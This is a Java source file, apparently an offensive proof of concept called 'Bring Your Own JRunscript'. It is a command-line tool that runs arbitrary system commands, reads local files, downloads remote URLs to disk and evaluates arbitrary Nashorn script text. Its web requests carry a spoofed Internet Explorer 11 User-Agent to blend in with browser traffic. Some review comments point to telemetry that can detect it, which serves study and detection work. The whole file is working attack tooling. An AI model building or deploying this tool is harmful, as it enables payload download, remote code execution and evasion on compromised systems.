Bring Your Own JRunscript PoC
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.Reader;
import java.net.URL;
import java.net.URLConnection;
import java.util.Locale;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;
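/**
 * Command-line dispatcher published as a proof of concept ("Bring Your Own JRunscript").
 *
 * <p>It expects exactly two arguments, {@code -e} and one call expression, and maps
 * {@code exec(...)}, {@code cat(...)} and {@code cp(...)} onto the static methods below;
 * {@code load(...)} is handed to the Nashorn script engine.
 *
 * <p>Review notes: every capability takes its input directly from the command line with no
 * allow-list or path restriction. The process can start child processes, read local files,
 * fetch http(s) URLs and evaluate script text. All outbound requests made by this class carry
 * the fixed {@link #USER_AGENT} value, a browser-style string sent by a JVM. A Java process
 * that spawns children or sends that header is therefore something process-creation and proxy
 * telemetry can be checked for.
 */
public class BYOJ {

    /** User-Agent header sent on every HTTP(S) request made by this class (an Internet Explorer 11 style value). */
    private static final String USER_AGENT =
            "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";

    /**
     * Starts a child process for the given command line, echoes its standard output to
     * {@code System.out} and waits for it to finish. The exit code is not returned.
     *
     * <p>{@code cmd} is passed to {@link Runtime#exec(String)} unchanged. Only standard output
     * is read; standard error is not drained.
     *
     * @param cmd command line to run
     * @throws IOException if the process cannot be started or its output cannot be read
     * @throws InterruptedException if the calling thread is interrupted while waiting
     */
    @SuppressWarnings("deprecation") // Runtime.exec(String) is deprecated on recent JDKs
    public static void exec(String cmd) throws IOException, InterruptedException {
        Process process = Runtime.getRuntime().exec(cmd);
        // BufferedReader replaces the deprecated DataInputStream.readLine and is closed on exit.
        try (BufferedReader stdout =
                new BufferedReader(new InputStreamReader(process.getInputStream()))) {
            String line;
            while ((line = stdout.readLine()) != null) {
                System.out.println(line);
            }
        }
        process.waitFor();
    } // end exec method

    /**
     * Prints the content of a file, an http(s) URL or a {@link Reader} to {@code System.out}.
     * A {@link File} that is a directory is not listed; only its path is printed.
     *
     * <p>A target counts as a URL when its string form contains {@code http://} or
     * {@code https://}. A reader supplied by the caller is left open; streams opened here are
     * closed before returning.
     *
     * @param obj a path ({@code String} or {@code File}), a URL string, or a {@code Reader}
     * @param pattern accepted for signature compatibility; this implementation ignores it
     * @throws IOException if the source cannot be opened or read
     */
    public static void cat(Object obj, String pattern) throws IOException {
        if (obj instanceof File && ((File) obj).isDirectory()) {
            System.out.println(obj.toString());
            return;
        }

        String target = obj.toString();
        if (isHttpUrl(target)) {
            try (BufferedReader in = openUrlReader(target)) {
                printLines(in);
            }
            return;
        }

        if (obj instanceof Reader) {
            // Caller-owned reader: wrap it if needed, but do not close it.
            BufferedReader reader = obj instanceof BufferedReader
                    ? (BufferedReader) obj
                    : new BufferedReader((Reader) obj);
            printLines(reader);
            return;
        }

        // Use the string form so a non-directory File works as well as a String path.
        try (BufferedReader reader =
                new BufferedReader(new InputStreamReader(new FileInputStream(target)))) {
            printLines(reader);
        }
    } // end cat method

    /**
     * Copies a local file or the body of an http(s) URL to a local file.
     *
     * <p>Local files are copied byte for byte. A URL response is handled as text: it is read
     * line by line and each line is written followed by {@code "\n"}.
     *
     * @param from source path or URL
     * @param to destination path
     * @throws IOException if either side cannot be opened, read or written
     */
    public static void cp(String from, String to) throws IOException {
        // Compare by content: opening the same path for writing would truncate the source.
        if (from == to || (from != null && from.equals(to))) {
            System.out.println("file " + from + " cannot be copied onto itself!");
            return;
        }

        if (!isHttpUrl(from)) {
            try (BufferedInputStream in = new BufferedInputStream(new FileInputStream(from));
                    BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(to))) {
                byte[] buffer = new byte[1024];
                int read;
                while ((read = in.read(buffer)) > 0) {
                    out.write(buffer, 0, read);
                }
            }
            return;
        }

        try (BufferedReader in = openUrlReader(from);
                FileWriter writer = new FileWriter(to)) {
            String line;
            while ((line = in.readLine()) != null) {
                writer.write(line + "\n");
            }
        }
    } // end cp method

    /**
     * Entry point: {@code -e <call>} where {@code <call>} is {@code exec('...')},
     * {@code cat('...')}, {@code cp('...','...')} or a {@code load(...)} expression.
     *
     * <p>Malformed input prints a message and returns instead of failing with an index
     * exception.
     *
     * @param args the switch and the call expression
     * @throws ScriptException if the script engine rejects the {@code load} expression
     * @throws IOException if a file or network operation fails
     * @throws InterruptedException if interrupted while waiting for a child process
     */
    public static void main(String[] args) throws ScriptException, IOException, InterruptedException {
        if (args.length != 2) {
            System.out.println("[-] Ensure you use correct syntax");
            return;
        }

        String theSwitch = args[0];
        String theFunction = args[1];

        if (!theSwitch.equalsIgnoreCase("-e")) {
            System.out.println("[-] Must specify -e flag first");
            return;
        }

        int open = theFunction.indexOf('(');
        if (open < 0) {
            System.out.println("[-] Ensure you use correct syntax");
            return;
        }
        String justFunction = theFunction.substring(0, open).toLowerCase(Locale.ROOT);

        if (justFunction.equals("exec")) {
            String theCommand = stripOuterChars(argumentText(theFunction));
            if (theCommand == null) {
                System.out.println("[-] Ensure you use correct syntax");
                return;
            }
            exec(theCommand);
        } else if (justFunction.equals("cat")) {
            String thePath = stripOuterChars(argumentText(theFunction));
            if (thePath == null) {
                System.out.println("[-] Ensure you use correct syntax");
                return;
            }
            cat(thePath, "");
        } else if (justFunction.equals("cp")) {
            String theArgs = argumentText(theFunction);
            String[] parts = theArgs == null ? new String[0] : theArgs.split(",");
            if (parts.length < 2) {
                System.out.println("[-] Ensure you use correct syntax");
                return;
            }
            String from = stripOuterChars(parts[0]);
            String to = stripOuterChars(parts[1]);
            if (from == null || to == null) {
                System.out.println("[-] Ensure you use correct syntax");
                return;
            }
            cp(from, to);
        } else if (justFunction.equals("load")) {
            // getEngineByName returns null when the JVM ships no Nashorn engine.
            ScriptEngine nashorn = new ScriptEngineManager().getEngineByName("nashorn");
            if (nashorn == null) {
                System.out.println("[-] Nashorn script engine is not available in this JVM");
                return;
            }
            System.setProperty("http.agent", USER_AGENT);
            // NOTE(review): the whole argument string is evaluated as script, not only a
            // load() call, so this branch runs arbitrary script text from the command line.
            nashorn.eval(theFunction);
        } else {
            System.out.println("[-] Function not recognized.");
        }
    } // end main

    /** Reports whether the string form of a target contains an http:// or https:// marker. */
    private static boolean isHttpUrl(String target) {
        return target.contains("http://") || target.contains("https://");
    }

    /** Opens the URL with the fixed User-Agent header and returns a reader over the response body. */
    @SuppressWarnings("deprecation") // URL(String) is deprecated on recent JDKs
    private static BufferedReader openUrlReader(String url) throws IOException {
        URLConnection conn = new URL(url).openConnection();
        conn.setRequestProperty("User-Agent", USER_AGENT);
        conn.connect();
        return new BufferedReader(new InputStreamReader(conn.getInputStream()));
    }

    /** Echoes every remaining line of the reader to System.out. */
    private static void printLines(BufferedReader reader) throws IOException {
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
    }

    /** Returns the text between the first "(" and the first ")", or null when they are missing or out of order. */
    private static String argumentText(String call) {
        int open = call.indexOf('(');
        int close = call.indexOf(')');
        if (open < 0 || close <= open) {
            return null;
        }
        return call.substring(open + 1, close);
    }

    /** Drops the first and last character (expected to be quotes, not verified); null when shorter than two characters. */
    private static String stripOuterChars(String token) {
        if (token == null || token.length() < 2) {
            return null;
        }
        return token.substring(1, token.length() - 1);
    }
} // end BYOJ class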